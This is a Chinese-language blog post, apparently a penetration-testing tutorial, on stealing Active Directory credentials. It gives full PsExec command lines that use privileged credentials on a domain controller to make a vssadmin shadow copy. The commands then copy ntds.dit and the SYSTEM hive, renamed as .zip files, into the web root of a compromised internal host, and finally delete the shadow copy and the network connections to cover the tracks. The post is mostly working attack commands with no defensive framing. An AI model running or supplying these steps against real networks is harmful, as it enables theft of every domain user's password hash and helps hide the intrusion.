MENU

域渗透 - psexec + vssadmin转存ntds.dit

January 28, 2021 • Read: 448 • 后渗透阅读设置

0x00 前言

psexec是Windows Sysinternals中的一块免费工具,通常用于后渗透渗透过程中的命令执行。

ntds.dit是活动目录的数据文件,默认存储在 C:WindowsNTDS 目录下,我们可以通过获取它进而拿到域内的所有用户hash。

vssadmin通常用于创建或删除卷影副本,正在运行的进程不能copy,我们可以通过它转存ntds.dit。

0x01 介绍

vssadmin

可以去官方文档详细了解命令与操作。

https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/vssadmin

它的适用版本包括:

Windows 10,Windows 8.1,Windows Server 2016,Windows Server 2012 R2,Windows Server 2012,Windows Server 2008 R2,Windows Server 2008

再包含2008版本的服务器系统以上的版本均自带vssadmin。

psexec

可以去官方文档详细了解下载,命令与操作。

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

同样的,他的适用版本包括:

客户端:Windows Vista及更高版本。
服务器:Windows Server 2008及更高版本。

0x02 操作

在已经获取一台内网机器的情况下,通过psexec用有权限的账号密码登陆域控,去转存ntds.dit复制到在控内网机器本地。

通过psexec执行命令查询现有卷影副本:

PsExec64.exe /accepteula /s \\DC.IP -u DCNAME\USERNAME -p PASSWORD cmd /C "vssadmin list shadows"

通过psexec执行命令创建卷影副本:

PsExec64.exe /accepteula /s \\DC.IP -u DCNAME\USERNAME -p PASSWORD cmd /C "vssadmin create shadow /for=c:"

通过psexec执行命令netuse连接在控内网机器(能登录在控内网的账号密码):

PsExec64.exe /accepteula /s \\DC.IP -u DCNAME\USERNAME -p PASSWORD cmd /C "net use \\ABC.IP  password /user:DCNAME\USERNAME" 

连接成功后通过通过psexec执行命令copy到在控内网机器:

HarddiskVolumeShadowCopy3具体看自己创建卷影副本的时候是哪个卷影副本。

PsExec64.exe /accepteula /s \\DC.IP -u DCNAME\USERNAME -p PASSWORD cmd /C "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit \\ABC.IP\c$\inetpub\wwwroot\doc\ntds.zip"

通过psexec执行命令copy下SYSTEM文件到在控内网机器:

PsExec64.exe /accepteula /s \\DC.IP -u DCNAME\USERNAME -p PASSWORD cmd /C "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\System32\config\SYSTEM \\ABC.IP\c$\inetpub\wwwroot\doc\system.zip "

通过psexec执行命令删除卷影副本:

PsExec64.exe /accepteula /s \\DC.IP -u DCNAME\USERNAME -p PASSWORD cmd /C "vssadmin delete shadows /for=c: /quiet "

通过psexec执行命令删除全部netuse连接:

PsExec64.exe /accepteula /s \\DC.IP -u DCNAME\USERNAME -p PASSWORD cmd /C "net use * del /y "

原文作者:Keefe

原文链接:域渗透 - psexec + vssadmin转存ntds.dit

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可